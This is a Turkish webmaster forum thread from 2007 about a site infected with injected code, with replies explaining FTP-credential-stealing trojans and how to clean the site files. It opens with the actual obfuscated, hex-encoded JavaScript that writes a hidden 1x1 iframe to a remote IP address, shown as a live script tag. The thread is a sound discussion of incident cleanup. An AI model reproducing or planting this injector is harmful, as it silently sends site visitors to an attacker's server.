<!-- o65 --><script type="text/javascript">function E4C91FB26400DB2E8E6D1A43F8(E24F89741580A88A1){func tion B7BF85150AC30DBA42(){return 16;}return(parseInt(E24F89741580A88A1,B7BF85150AC3 0DBA42()));}function E34AB0D7708CB83225AC60547C769(A558AE9C2D9A9BCFF8A1 36E3D631DD2){var B23FC86F17B841112="";for(C39BD7887D5CF0A0869467393 D621AF=0;C39BD7887D5CF0A0869467393D621AF<A558AE9C2 D9A9BCFF8A136E3D631DD2.length;C39BD7887D5CF0A08694 67393D621AF+=2){B23FC86F17B841112+=(String.fromCha rCode(E4C91FB26400DB2E8E6D1A43F8(A558AE9C2D9A9BCFF 8A136E3D631DD2.substr(C39BD7887D5CF0A0869467393D62 1AF,2))));}document.write(B23FC86F17B841112);}E34A B0D7708CB83225AC60547C769("3C696672616D65207372633 D27687474703A2F2F35382E36352E3233332E39372F666F727 56D2F6F75742E706870272077696474683D273127206865696 768743D273127207374796C653D27646973706C61793A20686 96464656E3B273E3C2F696672616D653E");</script><!-- c65 -->
Siteme bu kod eklenmis, daha once de belirli sikintilarim olmustu bu olay hakkinda. Ayrica soyle de bisey yapmis kendini cok zeki zanneden biri.
BulutReklam.com.tr
Bundan korunma yolunu biri anlatabilirse cok sevinirim.
keylogger fln diyor ama...
17
●1.375
- 18-11-2007, 09:59:37phoenix adlı üyeden alıntı: mesajı görüntüle
%99,99 bilgisayarına trojan bulaşmış.
Bu trojan senin FTP sunucusuna baglanıp sitene ait her dosyaya bu kodu otomatik ekliyor.
Bu kod nedir peki?
Bu kod 1x1 boyutunda gizli iframe kodu. Trojanı bilgisayarına yerleştiren kişinin sitesine gizlidende olsa hit yolluyor senin sitene giren ziyaretçiler
Bilgisayarına format atman tek çözüm yolu ve antivirüssüz internette sört yapmayı hiç bir zaman aklından bile geçirme bu devirde - 18-11-2007, 12:50:40Üyeliği durdurulduGeçmiş olsun aynı şey 2 ay önce benimde başıma geldi
- 18-11-2007, 13:01:01Üyeliği durdurulduBunu DW ile replace edebilirsin yani düzeltebilirsin.
Fakat radminin dediğini ilkkez duyuyorum. Bana bulaşan tarzı şöyleydi.
Phptracker ile trojan downloader bulaştırıyordu, o downloader da indiriyordu netden birşeyler.
Çaktırmadan temizlemiştim. Ama sende biraz farklı bir durum var sanki gizlenmiş kodlar bunlar... - 18-11-2007, 13:13:48Üyeliği durdurulduDW nedir? Bir de aslinda asiri sormak ihtiyaci hissediyorum, format cozum degil diyenler var arastirmalarimda gordugum kadariyla. Basina gelenler bundan nasil kurtuldu?FromETC adlı üyeden alıntı: mesajı görüntüle
- 18-11-2007, 13:19:13Üyeliği durdurulduŞöyle diyeyim keylogger sitenize bulaşıyor.phoenix adlı üyeden alıntı: mesajı görüntüle
bilgisayarınızı temizlediğiniz anda bile sitenizde dolaşırsanız yine bulaştırıyorsunuz kendinize. Bunun için anti-viruslerin en manyağı olan Kaspersky programını kurmanız gerekiyor(internet secrutry).
Bilgisayarınızı temizledikten sonra sitelere girmeyin. ardından FTP yardımı ile sitenizi komple indirin. Kaspersky dosyalarınızı indirdiğiniz anda her dosyayı taradığı için buluyor. Siteniz üzerinde r57,c99 gibi shell lerde varsa hepsini tespit ediyor. php dosyalarınızda yüklü olan kodları bu şekilde bulabilirsiniz. DW ise dreamweaver bununla toplu replace yapabilirsiniz. Yine farklı bir yöntem google desktop search ile örnek bir kod alıp onu aratarak varolan dosyalardaki istemediğiniz kodları çıkarabilirsiniz. yani kodların mevcut olduğu dosyaları.
Düşündüğümüzde dahada çeşitli çözüm yolları oluşturabiliriz. Ama kim demişse temizlenmez yalan demiş.
